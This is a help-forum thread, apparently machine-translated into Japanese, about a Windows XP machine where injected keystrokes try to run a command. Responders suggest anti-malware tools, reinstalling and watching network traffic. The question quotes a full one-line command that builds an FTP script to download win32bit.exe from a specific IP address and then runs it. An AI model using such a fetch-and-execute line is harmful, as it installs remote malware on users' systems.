私のシステムは奇妙な振る舞いをしています、ウイルスに感染している可能性はありますか？

過去2日間、私は自分のコンピュータで奇妙な行動をしていますが、これはウイルスであると強く疑っています。 突然、一連のキーボードイベントが参加します。コマンドプロンプトを開き、次の行を実行しようとします。 del eq&echo open 186.81.185.135 14062 >> eq&echo user 12120 17227 >> eq &echo get win32bit.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32bit.exe &del eq これは私が操作しているWin XP SP3で、McAfeeを実行しています。どんな体がそれが何であるかという考えを持っていますか？

Malwarebytes Anti-Malwareを実行します。がんばって ここに 。あなたはそれでそれを削除することができるかもしれません。そうでない場合は、フォーマットして再ロードするのがシステムをクリーンアップするための最も迅速で簡単な方法です。良いリロードのほかにも、OSは正常に動作し続けています。それが役立つことを願っています。

あなたの通常のウイルススキャナが脅威（既知または未知）を拾わないのであれば、それが本物ではないという意味ではありません。与える 脅迫 ウイルスシグネチャではなく行動分析に依存しているウイルス対策プログラム

Spybot Searchをおすすめします。破壊する。

ネットワークトラフィックが何をしているのか確認してください。あなたはそれがリモートセッションなのか、リモートで操作されるトロイの木馬なのかを理解するためにそれを使うことができるかもしれません。

また、Read BytesとWrite Bytesに基づいて、どの実行可能ファイルがタスクマネージャで実行されているかを監視することもできます。それが私のシステムのバグを捕らえた理由です。

ええ、あなたは妥協しました。トロイの木馬やルートキットを完全に診断して修復するための専門知識がない場合は、OSを再インストールすることが安全な方法です。楽しむ。

今日のウイルス対策ツールは、今日一般的な脅威の多種多様かつ迅速な変異からあなたを保護する仕事にかかっていません。特に伝統的な署名ベースのスキャナはほとんど役に立ちません。あなたのマシンがきれいだとは思わないでくださいあなたのシステムトレイに座って、あなたのCPUの半分を使い果たしている安心できる小さなアイコンがあるからといって。

今日、このまさにそのIPアドレスは動的であるように見えます、それはその目的のために奇妙に見えます。

$ dig -x 186.81.185.135
[..]
135.185.81.186.in-addr.arpa。 86400 in PTR Dynamic-IP-18681185135.cable.net.co。
[..]

しかし、これ 実際にはかなり古いかもしれません それで、あなたのウィルススキャナは確かに動いていますか…？

編集 ： 昨日、 186.81.185.135を検索中 今日唯一の2の結果を与えました。

あなたはおそらくVNCをセットアップしていますか？そしておそらくあなたはそれのためのパスワードを設定していませんね。これがワームがあなたのコンピュータに侵入しようとした方法です。 186.81.185.135ホストは、おそらくVNCを正しく設定していない別の貧しい人なので、無関係です。

ワームは、win32bit.exeをダウンロードして準備ができたらそれを実行するためのftp用のスクリプトを作成しようとします。

それが成功したかどうかを判断するのは難しいので、ある種のアンチスキャナを実行することをお勧めします。

あなたのシステムは最新のものですか？今月のMalicious Software Removal toolを含む、マイクロソフトからの最新かつ最高のものすべてを手に入れたことを確認しても問題ありません。あなたが持っているものを見つけて削除するかもしれません。上記のすべてのスパイウェアツールも優れたオプションです（Malwarebytesが好きです）。